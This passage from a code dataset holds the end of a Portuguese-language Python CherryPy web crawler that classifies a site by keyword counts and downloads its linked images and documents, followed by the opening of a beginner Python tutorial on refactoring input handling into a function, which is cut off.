        '\n\t\t\tif contador == len(aux_links_externos_categorias) - 1:\n\t\t\t\tbreak;\n\t\t# ------------------------------\n\t\t# ---------- IMAGENS -----------\n\t\thdnTxtCaminhoImagens = unquote(hdnTxtCaminhoImagens)\n\t\timagens = hdnTxtCaminhoImagens.split('<#>')\n\t\t\n\t\timagem_pequena = \"\"\n\t\timagem_grande = \"\"\n\t\t\n\t\tfor contador in range(len(imagens)-1):\n\t\t\timagem = imagens[contador]\n\t\t\timagem_pequena = imagem_pequena + '
        '\n\t\t\timagem_grande = imagem_grande + ''\n\t\t# ------------------------------\n\t\t# ---------- ARQUIVOS ----------\n\t\taux_arquivos = \"\"\n\t\thdnTxtCaminhoArquivos = unquote(hdnTxtCaminhoArquivos)\n\t\tarquivos = hdnTxtCaminhoArquivos.split('<#>')\n\t\t\n\t\tfor contador in range(len(arquivos)-1):\n\t\t\tarquivo = arquivos[contador].split('<##>')\n\t\t\taux_arquivos = aux_arquivos + ''\n\t\t# ------------------------------\n\t\t\n\t\t# -----> URL DECODE + COLOCAR NA PÁGINA <-----\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\ttela = tela.replace('::site::', str(unquote(hdnTxtSite)))\n\t\ttela = tela.replace('::inicio::', str(unquote(hdnTxtInicio)))\n\t\ttela = tela.replace('::termino::', str(unquote(hdnTxtFim)))\n\t\ttela = tela.replace('::metodo::', str(unquote(hdnTxtTipoCategorizacao)))\n\t\ttela = tela.replace('::classificacao::', str(unquote(hdnTxtCategoria)))\n\t\t\n\t\ttela = tela.replace('::palavras_decisivas::', str(unquote(hdnTxtPalavras)))\n\t\t\n\t\ttela = tela.replace('::internos_categorias::', str(links_internos_categorias))\n\t\ttela = tela.replace('::internos_links::', str(links_internos))\n\t\t\n\t\ttela = tela.replace('::externos_categorias::', str(links_externos_categorias))\n\t\ttela = tela.replace('::externos_links::', str(links_externos))\n\t\t\n\t\ttela = tela.replace('::imagem_pequena::', str(imagem_pequena))\n\t\ttela = tela.replace('::imagem_grande::', str(imagem_grande))\n\t\t\n\t\ttela = tela.replace('::arquivos::', str(aux_arquivos))\n\t\t# -----> /URL DECODE <-----\n\t\t\n\t\tarq.close()\n\t\treturn tela\n\tresultado.exposed = True\n\t\n\t#pagina de erro na URL\n\tdef erro(self, hdnTxtSite=None):\n\t\tarq = open('c:/py/pi4/erro.html', 'r', encoding='latin1')\n\t\ttela = arq.read()\n\t\ttela = tela.encode('latin-1').decode('utf-8')\n\t\ttela = tela.replace('::site::', str(hdnTxtSite))\n\t\tarq.close()\n\t\treturn tela\n\terro.exposed = True\n\t\n\t#inicio do crawler\n\tdef inicio(self, hdnTxtPesquisa=None):\n\t\n\t\tdef numeroImagem():\n\t\t\tarq = open('c:/py/pi4/conf_imagem.txt', 'r')\n\t\t\tnumero = arq.read()\n\t\t\tarq.close()\n\t\t\tarq = open('c:/py/pi4/conf_imagem.txt', 'w')\n\t\t\tarq.write(str(int(numero) + 1))\n\t\t\tarq.close()\n\t\t\treturn numero\n\t\t\t\n\t\t# Organiza em ordem alfabetica e retira links duplicados\n\t\tdef trataArray(seq):\n\t\t\tseq.sort()\n\t\t\tnoDupes = []\n\t\t\t[noDupes.append(i) for i in seq if not noDupes.count(i)]\n\t\t\treturn noDupes\n\n\t\t# Adiciona um texto em um arquivo\n\t\tdef escreveArq(caminho, texto, modo):\n\t\t\ttry:\n\t\t\t\tarq = open(caminho, modo, encoding='latin1')\n\t\t\t\tarq.write(texto)\n\t\t\t\tarq.close()\n\t\t\t\treturn True\n\t\t\texcept:\n\t\t\t\treturn False\n\n\t\t# Faz a leitura do arquivo de configuracao das categorias\t\t\n\t\tdef leituraConf(conf):\n\t\t\tarq = open(conf,\"r\", encoding='latin1')\n\t\t\tcategorias = []\n\t\t\tcontador = 0\n\t\t\twhile True:\n\t\t\t\tline = arq.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tif(line != ''):\n\t\t\t\t\t\tif line[:1] == '@':\n\t\t\t\t\t\t\tcategorias.append([line[1:].strip().upper(), 0, [], []])\n\t\t\t\t\t\t\tcontador += 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tcategorias[contador - 1][2].append(line.strip().lower())\n\t\t\t#Nome da categoria / Quantidade de palavras chaves / Lista de palavras / Lista de links\n\t\t\treturn categorias\n\t\t\t\n\t\tdef leituraHtmlBase(html_base):\n\t\t\thtml = \"\"\n\t\t\tarq = open(html_base,\"r\", encoding='latin1')\n\t\t\twhile True:\n\t\t\t\tline = 
arq.readline()\n\t\t\t\tif not line:\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tif(line != ''):\n\t\t\t\t\t\thtml += line\n\t\t\treturn html\n\n\t\t#Extrai a extensao do arquivo passado, se nao for um arquivo, ate primeiro ponto encontrado de tras para frente\n\t\tdef extraiExtensao(texto):\n\t\t\textensao = \"\"\n\t\t\taux = \"\"\n\t\t\tcontador = 1\n\t\t\twhile contador <= len(texto):\n\t\t\t\taux = texto[len(texto) - contador]\n\t\t\t\tif aux != \".\":\n\t\t\t\t\textensao = str(aux) + str(extensao)\n\t\t\t\t\tcontador = contador + 1\n\t\t\t\telse:\n\t\t\t\t\tbreak\n\t\t\treturn extensao\n\t\t\t\n\t\tdef trataUrlLink(url, link):\n\t\t\tfinal = \"\"\n\t\t\tif link:\n\t\t\t\tlink = link.strip()\n\t\t\t\turl = url.strip()\n\t\t\t\tif link != \"#\":\n\t\t\t\t\tif link[:7] != \"http://\" and link[:8] != \"https://\":\n\t\t\t\t\t\tif url[-4:] == \".php\" or url[-5:] == \".html\" or url[-4:] == \".htm\" or url[-4:] == \".asp\" or url[-4:] == \".jsp\":\n\t\t\t\t\t\t\taux = \"\"\n\t\t\t\t\t\t\tcontador = 1\n\t\t\t\t\t\t\twhile contador <= len(url):\n\t\t\t\t\t\t\t\taux = url[len(url) - contador]\n\t\t\t\t\t\t\t\tif aux == \"/\":\n\t\t\t\t\t\t\t\t\tif link[:1] != \"/\":\n\t\t\t\t\t\t\t\t\t\tfinal += url[:(1-contador)] + link\n\t\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\t\tfinal += url[:(1-contador)] + link[1:]\n\t\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tcontador = contador + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfinal = url\n\t\t\t\t\t\t\tif final[-1:] == \"/\":\n\t\t\t\t\t\t\t\tif link[:1] != \"/\":\n\t\t\t\t\t\t\t\t\tfinal += link\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfinal += link[1:]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\tif link[:1] != \"/\":\n\t\t\t\t\t\t\t\t\tfinal += \"/\" + link\n\t\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t\t\tfinal += link\n\t\t\t\t\telse:\n\t\t\t\t\t\tfinal = link\n\t\t\treturn final\n\t\t\t\n\t\tdef categorizarPagina(soup, lista_categorias):\n\t\t\tmeta_keywords_encontrado = False\n\t\t\tkeywords = \"\"\n\t\t\t\n\t\t\tquantidade_1 = 0\n\t\t\tquantidade_2 = 0\n\t\t\tquantidade_3 = 0\n\t\t\tretorno = []\n\t\t\tretorno.append(\"\") #Tipo de categorizacao\n\t\t\tretorno.append(0) #Quantidade de palavras-chaves encontradas (principal)\n\t\t\tretorno.append(\"\") #Categoria definida (principal)\n\t\t\tretorno.append(0) #Quantidade de palavras-chaves encontradas (secundaria)\n\t\t\tretorno.append(\"\") #Categoria definida (secundaria)\n\t\t\tretorno.append(0) #Quantidade de palavras-chaves encontradas (terciaria)\n\t\t\tretorno.append(\"\") #Categoria definida (terciaria)\n\t\t\t\n\t\t\tretorno.append(0) #Quantidade de palavras mais encontrada (1)\n\t\t\tretorno.append(\"\") #Palavra mais encontrada (1)\n\t\t\tretorno.append(0) #Quantidade de palavras mais encontrada (2)\n\t\t\tretorno.append(\"\") #Palavra mais encontrada (2)\n\t\t\tretorno.append(0) #Quantidade de palavras mais encontrada (3)\n\t\t\tretorno.append(\"\") #Palavra mais encontrada (3)\n\t\t\t\n\t\t\tfor metas in soup.find_all('meta'):\n\t\t\t\tmeta = metas.get('name')\n\t\t\t\tif meta == \"keywords\":\n\t\t\t\t\tmeta_keywords_encontrado = True\n\t\t\t\t\tkeywords = metas.get('content')\n\t\t\t\t\tretorno[0] = \"Meta Tags\"\n\t\t\t\t\tbreak\n\t\t\t\n\t\t\tif retorno[0] == \"\":\n\t\t\t\tretorno[0] = \"Palavras-chaves\"\n\t\t\t\t\n\t\t\tfor categoria in lista_categorias:\n\t\t\t\tfor palavras_chaves in categoria[2]:\n\t\t\t\t\tquant = 0\n\t\t\t\t\t\n\t\t\t\t\tif meta_keywords_encontrado == True:\n\t\t\t\t\t\tquant = keywords.count(palavras_chaves)\n\t\t\t\t\telse:\n\t\t\t\t\t\tquant = 
texto_html.count(palavras_chaves)\n\t\t\t\t\tcategoria[1] += quant\n\t\t\t\t\n\t\t\t\t\tif quant > retorno[7]:\n\t\t\t\t\t\tif retorno[9] >= retorno[11]:\n\t\t\t\t\t\t\tretorno[11] = retorno[9]\n\t\t\t\t\t\t\tretorno[12] = retorno[10]\n\t\t\t\t\t\tif retorno[7] >= retorno[9]:\n\t\t\t\t\t\t\tretorno[9] = retorno[7]\n\t\t\t\t\t\t\tretorno[10] = retorno[8]\n\t\t\t\t\t\tretorno[7] = quant\n\t\t\t\t\t\tretorno[8] = palavras_chaves\n\t\t\t\t\telif meta_keywords_encontrado == True:\n\t\t\t\t\t\tif keywords.count(palavras_chaves) > retorno[9]:\n\t\t\t\t\t\t\tif retorno[9] >= retorno[11]:\n\t\t\t\t\t\t\t\tretorno[11] = retorno[9]\n\t\t\t\t\t\t\t\tretorno[12] = retorno[10]\n\t\t\t\t\t\t\tretorno[9] = quant\n\t\t\t\t\t\t\tretorno[10] = palavras_chaves\n\t\t\t\t\t\telif keywords.count(palavras_chaves) > retorno[11]:\n\t\t\t\t\t\t\tretorno[11] = quant\n\t\t\t\t\t\t\tretorno[12] = palavras_chaves\n\t\t\t\t\telse:\n\t\t\t\t\t\tif texto_html.count(palavras_chaves) > retorno[9]:\n\t\t\t\t\t\t\tif retorno[9] >= retorno[11]:\n\t\t\t\t\t\t\t\tretorno[11] = retorno[9]\n\t\t\t\t\t\t\t\tretorno[12] = retorno[10]\n\t\t\t\t\t\t\tretorno[9] = quant\n\t\t\t\t\t\t\tretorno[10] = palavras_chaves\n\t\t\t\t\t\telif texto_html.count(palavras_chaves) > retorno[11]:\n\t\t\t\t\t\t\tretorno[11] = quant\n\t\t\t\t\t\t\tretorno[12] = palavras_chaves\n\t\t\t\t\n\t\t\t\t#Verifica se ha outra categoria anterior com uma quantidade maior de palavras chaves encontradas\n\t\t\t\tif categoria[1] > quantidade_1:\n\t\t\t\t\tif retorno[3] >= retorno[5]:\n\t\t\t\t\t\tretorno[5] = retorno[3]\n\t\t\t\t\t\tretorno[6] = retorno[4]\n\t\t\t\t\tif retorno[1] >= retorno[3]:\n\t\t\t\t\t\tretorno[3] = retorno[1]\n\t\t\t\t\t\tretorno[4] = retorno[2]\n\t\t\t\t\tretorno[1] = categoria[1]\n\t\t\t\t\tretorno[2] = categoria[0]\n\t\t\t\telif categoria[1] > quantidade_2:\n\t\t\t\t\tif retorno[3] >= retorno[5]:\n\t\t\t\t\t\tretorno[5] = retorno[3]\n\t\t\t\t\t\tretorno[6] = retorno[4]\n\t\t\t\t\tretorno[3] = categoria[1]\n\t\t\t\t\tretorno[4] = categoria[0]\n\t\t\t\telif categoria[1] > quantidade_3:\n\t\t\t\t\tretorno[5] = categoria[1]\n\t\t\t\t\tretorno[6] = categoria[0]\n\t\t\t\t\t\n\t\t\treturn retorno\n\t\t\t\n\t\tdef classificaLink(links, dominio, url, lista_categorias):\n\t\t\tvalidado = False\n\t\t\tlink_interno = False\n\t\t\tlink_retorno = \"\"\n\t\t\tcategoria = ''\n\t\t\t# Obtem o \"href\" dos links\n\t\t\tlink = links.get('href')\n\t\t\t# Verifica se o valor de link e nulo\n\t\t\tif link is not None:\n\t\t\t\t# Retira os espacos em branco antes e depois do link\n\t\t\t\tlink = link.strip()\n\t\t\t\tif link.count(dominio) > 0:\n\t\t\t\t\tif link[:7] == \"http://\" or link[:8] == \"https://\":\n\t\t\t\t\t\tif link.find(dominio) < 15:\n\t\t\t\t\t\t\tlink_interno = True\n\t\t\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t\t\t#link_site.append(link)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t\t\t#link_externo.append(link)\n\t\t\t\t\telse:\n\t\t\t\t\t\taux = trataUrlLink(url, link)\n\t\t\t\t\t\t#Verifica se com a URL, e possivel chegar a um caminho acessivel\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\turllib.request.urlopen(aux)\n\t\t\t\t\t\t\trequest = urllib.request.urlopen(link_retorno)\n\t\t\t\t\t\t\thtml = request.read()\n\t\t\t\t\t\t\thtml = html.decode(\"utf-8\", \"ignore\")\n\t\t\t\t\t\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\t\t\t\t\t\tsoup = BeautifulSoup(html)\n\t\t\t\t\t\t\tcategoria = categorizarPagina(soup, lista_categorias)\n\t\t\t\t\t\t\tvalidado = True\n\t\t\t\t\t\t#Caso nao seja possivel, utiliza o dominio para montar a 
URL\n\t\t\t\t\t\texcept:\n\t\t\t\t\t\t\taux = trataUrlLink(\"http://\" + dominio, link)\n\t\t\t\t\t\tif aux != \"\":\n\t\t\t\t\t\t\tlink_interno = True\n\t\t\t\t\t\t\tlink_retorno = aux\n\t\t\t\t\t\t\t#link_site.append(aux)\n\t\t\t\telif link.count(url) > 0:\n\t\t\t\t\tlink_interno = True\n\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t#link_site.append(link)\n\t\t\t\telif link[:7] == \"http://\" or link[:8] == \"https://\":\n\t\t\t\t\tlink_retorno = link\n\t\t\t\t\t#link_externo.append(link)\n\t\t\t\telse:\n\t\t\t\t\taux = trataUrlLink(url, link)\n\t\t\t\t\t#Verifica se com a URL, e possivel chegar a um caminho acessivel\n\t\t\t\t\ttry:\n\t\t\t\t\t\turllib.request.urlopen(aux)\n\t\t\t\t\t\trequest = urllib.request.urlopen(link_retorno)\n\t\t\t\t\t\thtml = request.read()\n\t\t\t\t\t\thtml = html.decode(\"utf-8\", \"ignore\")\n\t\t\t\t\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\t\t\t\t\tsoup = BeautifulSoup(html)\n\t\t\t\t\t\tcategoria = categorizarPagina(soup, lista_categorias)\n\t\t\t\t\t\tvalidado = True\n\t\t\t\t\t#Caso nao seja possivel, utiliza o dominio para montar a URL\n\t\t\t\t\texcept:\n\t\t\t\t\t\taux = trataUrlLink(\"http://\" + dominio, link)\n\t\t\t\t\tif aux != \"\":\n\t\t\t\t\t\tlink_interno = True\n\t\t\t\t\t\tlink_retorno = aux\n\t\t\t\t\t\t#link_site.append(aux)\n\t\t\t\n\t\t\t#Obtem a categoria do link\n\t\t\tif validado == False:\n\t\t\t\ttry:\n\t\t\t\t\trequest = urllib.request.urlopen(link_retorno)\n\t\t\t\t\thtml = request.read()\n\t\t\t\t\thtml = html.decode(\"utf-8\", \"ignore\")\n\t\t\t\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\t\t\t\tsoup = BeautifulSoup(html)\n\t\t\t\t\tcategoria = categorizarPagina(soup, lista_categorias)\n\t\t\t\t\tvalidado = True\n\t\t\t\texcept:\n\t\t\t\t\treturn ['']\n\t\t\t\n\t\t\tretorno = []\n\t\t\tretorno.append(link_retorno)\n\t\t\tretorno.append(link_interno)\n\t\t\tretorno.append(categoria[2])\n\t\t\treturn retorno\n\t\t\t\n\t\tcaminho_projeto = \"c:/py/pi4/\"\n\t\tcaminho_projeto_fotos = caminho_projeto + \"imagens_sites/\"\n\t\tcaminho_projeto_documentos = caminho_projeto + \"documentos_sites/\"\n\t\tcaminho_aux_fotos = \"imagens_sites/\"\n\t\tcaminho_aux_documentos = \"documentos_sites/\"\n\t\tpasta_site = \"\"\n\t\t\n\t\tdiretorio_inicial = \"\"\n\t\t\n\t\thtml = \"\"\n\t\thtml_site = \"\"\n\t\thtml_categoria = \"\"\n\t\thtml_metodo = \"\"\n\t\thtml_data_inicio = \"\"\n\t\thtml_data_fim = \"\"\n\t\thtml_link_internos = \"\"\n\t\thtml_link_externos = \"\"\n\t\thtml_palavras = \"\"\n\n\t\ttexto_log_erros = \"\"\n\t\ttexto_links = \"\"\n\t\t\t\n\t\t#URL do site\n\t\turl = hdnTxtPesquisa.strip()\n\t\t#Dominio extraido da URL do site (usado na classificacao de links)\n\t\tdominio = \"\"\n\t\t#Arquivo de erros\n\t\tarquivo_erros = 'log.txt'\n\t\t#Arquivo de links\n\t\tarquivo_links = 'links.txt'\n\t\t#Arquivo de conclusao\n\t\tarquivo_fim = 'fim.txt'\n\t\t#Arquivo contendo as categorias e palavras chaves\n\t\tarquivo_conf = caminho_projeto + 'crawler.conf'\n\n\t\t#Variavel que indica que o site possui meta tags com Keywords da pagina\n\t\tmeta_keywords_encontrado = False\t\n\t\t#Variavel que armazenara as keywords do site caso ele possua\n\t\tkeywords = \"\"\n\n\t\t#Variavel que armazena a quantidade de palavras chaves encontradas\n\t\tquantidade_final = 0\n\t\t#O nome da categoria que teve mais palavras chaves presentes no html\n\t\tcategoria_final = \"\"\n\n\t\t#Variavel que ira armazenar o HTML da pagina\n\t\thtml = \"\"\n\t\t#Variavel que ira armazenar o texto do HTML da pagina\n\t\ttexto_html = \"\"\n\t\t#Lista com os links internos 
encontrados no site\n\t\tlink_site = []\n\t\t#Lista com os links externos encontrados no site\n\t\tlink_externo = []\n\t\t#Lista com os caminhos de imagens\n\t\tcaminhos_imagens = \"\"\n\t\t#Lista com os caminhos dos arquivos\n\t\tcaminhos_arquivos = \"\"\n\t\t\n\t\tdiretorio_inicial = url\n\t\t\n\t\ttry:\n\t\t\t#Extrai todo o HTML da pagina\n\t\t\trequest = urllib.request.urlopen(url)\n\t\t\t\n\t\t\twhile url != request.geturl():\n\t\t\t\turl = request.geturl()\n\t\t\t\trequest = urllib.request.urlopen(url)\n\t\t\t\n\t\t\thtml = request.read()\n\t\t\thtml = html.decode(\"utf-8\", \"ignore\").lower()\n\t\texcept:\n\t\t\t#RETORNO DE ERRO\n\t\t\treturn \"0\"\n\t\t\n\t\tcaminho_projeto = caminho_projeto + \"sites/\"\n\t\t\n\t\t#Encontra o dominio do site pela url digitada\n\t\tdominio = url.replace(\"http://www.\", \"\").replace(\"https://www.\", \"\").replace(\"/\", \"@\").replace(\"http://\", \"\").replace(\"https://\", \"\")\n\t\tif dominio.find(\"@\") != -1:\n\t\t\tdominio = dominio[:dominio.find(\"@\")]\n\t\t\n\t\t#Aplica o BeautifulSoup 4 no HTML\n\t\tsoup = BeautifulSoup(html)\n\t\t#Pega todo o texto da pagina\n\t\ttexto_html = soup.get_text()\n\t\t\n\t\tpasta_site = diretorio_inicial.replace(\"http://\", \"\").replace(\"/\", \"_\") + \"/\"\n\t\n\t\tcaminho_projeto = caminho_projeto + pasta_site\n\t\tarquivo_erros = caminho_projeto + arquivo_erros\n\t\tarquivo_links = caminho_projeto + arquivo_links\n\t\t\n\t\tif os.path.isfile(caminho_projeto + arquivo_fim):\n\t\t\tarq = open(caminho_projeto + arquivo_fim, 'r')\n\t\t\tretorno = arq.read()\n\t\t\tarq.close()\n\t\t\t#RETORNO CRAWLER JÁ FEITO\n\t\t\treturn retorno\n\t\t\n\t\tlista_categorias = leituraConf(arquivo_conf)\n\t\t\n\t\tif not os.path.isdir(caminho_projeto):\n\t\t\tos.mkdir(caminho_projeto)\n\n\t\thtml_site = url\n\t\thtml_data_inicio = strftime(\"%d/%m/%Y %H:%M:%S\")\n\n\t\t# ------ CATEGORIZAÇÃO DO SITE ------\n\t\tretorno = categorizarPagina(soup, lista_categorias)\n\n\t\thtml_metodo = retorno[0]\n\t\t\n\t\tcategoria_quant_1 = retorno[1]\n\t\tcategoria_1 = retorno[2]\n\t\tcategoria_quant_2 = retorno[3]\n\t\tcategoria_2 = retorno[4]\n\t\tcategoria_quant_3 = retorno[5]\n\t\tcategoria_3 = retorno[6]\n\t\t\n\t\tif categoria_quant_1 > 0 and categoria_quant_2 > 0 and categoria_quant_3 > 0:\n\t\t\tcategoria_quant_total = int(categoria_quant_1) + int(categoria_quant_2) + int(categoria_quant_3)\n\t\t\t\n\t\t\tperc_1 = int(categoria_quant_1) / int(categoria_quant_total) * 100\n\t\t\tperc_2 = int(categoria_quant_2) / int(categoria_quant_total) * 100\n\t\t\tperc_3 = int(categoria_quant_3) / int(categoria_quant_total) * 100\n\t\t\t\n\t\t\tpalavra_quant_1 = retorno[7]\n\t\t\tpalavra_1 = retorno[8]\n\t\t\tpalavra_quant_2 = retorno[9]\n\t\t\tpalavra_2 = retorno[10]\n\t\t\tpalavra_quant_3 = retorno[11]\n\t\t\tpalavra_3 = retorno[12]\n\t\t\t\n\t\t\thtml_palavras = palavra_1 + \" (\" + str(palavra_quant_1) + \" caso(s))\"\n\t\t\tif palavra_quant_2 > 0:\n\t\t\t\thtml_palavras = html_palavras + \" - \" + palavra_2 + \" (\" + str(palavra_quant_2) + \" caso(s))\"\n\t\t\tif palavra_quant_3 > 0:\n\t\t\t\thtml_palavras = html_palavras + \" - \" + palavra_3 + \" (\" + str(palavra_quant_3) + \" caso(s))\"\n\t\t\t\n\t\t\tif categoria_1 == \"\":\n\t\t\t\thtml_categoria = 'Nao foi possivel classificar o site em uma categoria'\n\t\t\telse:\n\t\t\t\thtml_categoria = categoria_1 + \"(\" + str(perc_1) + \"%)\"\n\t\t\t\t\n\t\t\tif categoria_quant_2 > 0:\n\t\t\t\thtml_categoria = html_categoria + \" - \" + categoria_2 + \"(\" + str(perc_2) + \"%)\"\n\t\t\tif 
categoria_quant_3 > 0:\n\t\t\t\thtml_categoria = html_categoria + \" - \" + categoria_3 + \"(\" + str(perc_3) + \"%)\"\n\t\telse:\n\t\t\thtml_categoria = 'Nao foi possivel classificar o site em uma categoria'\n\t\t\thtml_palavras = 'Nao foi encontrado palavras-chaves'\n\t\t# -----------------------------------\n\n\t\t# ------ OBTENÇÃO DE LINKS ------\n\t\tcontador = 1\n\t\ttotal_links = len(soup.find_all('a'))\n\t\t\n\t\t#Obtem todos os links do HTML\n\t\tfor links in soup.find_all('a'):\n\t\t\tprint(\"Link \"+str(contador)+\"/\"+str(total_links))\n\t\t\tcontador = contador + 1\n\t\t\t\n\t\t\t# ---- OBTENÇÃO DE DOCUMENTOS -----\n\t\t\tlink = links.get('href')\n\t\t\tif link is not None:\n\t\t\t\tif link[-4:] == \".csv\" or link[-4:] == \".pdf\" or link[-4:] == \".doc\" or link[-4:] == \".zip\" or link[-4:] == \".rar\" or link[-5:] == \".docx\" or link[-4:] == \".xls\" or link[-4:] == \".xlsx\" or link[-3:] == \".7z\":\n\t\t\t\t\tlink = trataUrlLink(\"http://\" + dominio, link)\n\t\t\t\t\ttry:\n\t\t\t\t\t\tfor cont in range(len(link) + 1):\n\t\t\t\t\t\t\tif link[-cont - 1] == \"/\":\n\t\t\t\t\t\t\t\tnome = link[-cont:]\n\t\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\tlocal = caminho_projeto_documentos + nome\n\t\t\t\t\t\turllib.request.urlretrieve(link, local)\n\t\t\t\t\t\t# Adiciona o documento na lista\n\t\t\t\t\t\tif caminhos_arquivos != \"\":\n\t\t\t\t\t\t\tcaminhos_arquivos = caminhos_arquivos + \"<#>\"\n\t\t\t\t\t\tcaminhos_arquivos = caminhos_arquivos + caminho_aux_documentos + nome + \"<##>\" + nome\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Erro ao baixar arquivo: \" + link + \"\\n\"\n\t\t\t\t# ---------------------------------\n\t\t\t\telse:\n\t\t\t\t\tretorno = classificaLink(links, dominio, diretorio_inicial, lista_categorias)\n\t\t\t\t\tif retorno[0] != \"\":\n\t\t\t\t\t\tif retorno[1] == True:\n\t\t\t\t\t\t\tlink_site.append(retorno[0] + \"<#>\" + retorno[2])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tlink_externo.append(retorno[0] + \"<#>\" + retorno[2])\n\t\t# -------------------------------\n\t\t\n\t\t#Organiza a lista de links encontrados\n\t\tlink_site = trataArray(link_site)\n\t\tlink_externo = trataArray(link_externo)\n\n\t\tlista_links_internos = \"\"\n\t\tfor link in link_site:\n\t\t\tif lista_links_internos != \"\":\n\t\t\t\tlista_links_internos = lista_links_internos + \"<##>\"\n\t\t\tlista_links_internos = lista_links_internos + link\n\t\t\t\n\t\tlista_links_externos = \"\"\n\t\tfor link in link_externo:\n\t\t\tif lista_links_externos != \"\":\n\t\t\t\tlista_links_externos = lista_links_externos + \"<##>\"\n\t\t\tlista_links_externos = lista_links_externos + link\n\t\t\n\t\t# ------ OBTENÇÃO DE IMAGENS ------\n\t\tcontador = 1\n\t\ttotal_imagens = len(soup.find_all('img'))\n\t\tfor imagens in soup.find_all('img'):\n\t\t\tprint(\"Imagem \"+str(contador)+\"/\"+str(total_imagens))\n\t\t\timagem = imagens.get('src')\n\t\t\timagem = trataUrlLink(\"http://\" + dominio, imagem)\n\t\t\textensao = extraiExtensao(imagem)\n\t\t\t\n\t\t\tif extensao.count(\"jpg\") == 0 and extensao.count(\"jpeg\") == 0 and extensao.count(\"bmp\") == 0 and extensao.count(\"gif\") == 0 and extensao.count(\"png\") == 0:\n\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Extens\\xe3o de imagem desconhecida: \" + extensao + \"\\n\"\n\t\t\t\tcontador = contador + 1\n\t\t\t\tcontinue\n\t\t\t\n\t\t\tlocal = caminho_projeto_fotos + numeroImagem() + \".\" + extensao\n\t\t\tif imagem is not None:\n\t\t\t\ttry:\n\t\t\t\t\turllib.request.urlretrieve(imagem, 
local)\n\t\t\t\texcept:\n\t\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Erro ao baixar imagem: \" + imagem + \"\\n\"\n\t\t\t\t\tcontador = contador + 1\n\t\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t\tobj = os.stat(local)\n\t\t\t\tif obj.st_size < 1024:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tos.remove(local)\n\t\t\t\t\texcept:\n\t\t\t\t\t\ttexto_log_erros += strftime(\"%d/%m/%Y %H:%M:%S\") + \" - Erro ao remover imagem muito pequena: \" + local + \"\\n\"\n\t\t\t\telse:\n\t\t\t\t\t# Adiciona a imagem na lista\n\t\t\t\t\tif caminhos_imagens != \"\":\n\t\t\t\t\t\tcaminhos_imagens = caminhos_imagens + \"<#>\"\n\t\t\t\t\t\t\n\t\t\t\t\tnome = \"\"\n\t\t\t\t\tfor cont in range(len(local) + 1):\n\t\t\t\t\t\tif local[-cont - 1] == \"/\":\n\t\t\t\t\t\t\tnome = local[-cont:]\n\t\t\t\t\t\t\tbreak\n\t\t\t\t\t\n\t\t\t\t\tcaminhos_imagens = caminhos_imagens + caminho_aux_fotos + nome\n\t\t\t\tcontador = contador + 1\n\t\t# ---------------------------------\n\t\t\n\t\thtml_data_fim = strftime(\"%d/%m/%Y %H:%M:%S\")\n\t\t\n\t\tretorno = url + \"|\" + html_data_inicio + \"|\" + html_data_fim + \"|\" + html_metodo + \"|\" + html_categoria + \"|\" + lista_links_internos + \"|\" + lista_links_externos + \"|\" + caminhos_imagens + \"|\" + caminhos_arquivos + \"|\" + html_palavras\n\t\t\n\t\tarq = open(caminho_projeto + arquivo_fim, 'w')\n\t\tarq.write(retorno)\n\t\tarq.close()\n\t\t\n\t\treturn retorno\n\tinicio.exposed = True\n\nimport os.path\ntutconf = os.path.join(os.path.dirname(__file__), 'htyhon.conf')\n\nif __name__ == '__main__':\n cherrypy.quickstart(WelcomePage(), config=tutconf)\nelse:\n cherrypy.tree.mount(WelcomePage(), config=tutconf)\n","repo_name":"jepiroupo/PI","sub_path":"SRC/pi4/py/pi4/hython.py","file_name":"hython.py","file_ext":"py","file_size_in_byte":24268,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"70066310930","text":"# Follow along from the tutorial - 'Refactor'\n# Fabio Fabrizi\n\n# Read in two numbers and multiply them\n\n\"\"\"\nnum1 = int(input(\"Enter a number \"))\nnum2 = int(input(\"And another \"))\n\nanswer = num1 * num2\n\nprint(f\"answer is {answer}\")\n\"\"\"\n\n# Modified version to catch exceptions\n# But notice how we're duplicating the code\n# Great example to put into a function\n\"\"\"\nnum1 = False\nwhile (num1 == False):\n try:\n num1 = int(input(\"Enter a number \"))\n except ValueError:\n print(\"That was not a number \", end=\"\")\n\nnum2 = False\nwhile (num2 == False):\n try:\n num2 = int(input(\"Enter a number \"))\n except ValueError:\n print(\"That was not a number \", end=\"\")\n\nanswer = num1 * num2\nprint(f\"answer is {answer}\")\n\"\"\"\n\n# Code above put into a function:\n\"\"\"\ndef readNum():\n num = False\n while (num == False):\n try:\n num = int(input(\"Enter a number \"))\n except ValueError:\n print(\"That was not a number \", end=\"\")\n return num\n\nnum1 = readNum()\nnum2 = readNum()\n\nanswer = num1 * num2\nprint(f\"answer is {answer}\")\n\"\"\"\n\n# And improved again\n# See how it's simplified with the use of a message\ndef readNum(message = \"Enter a number: 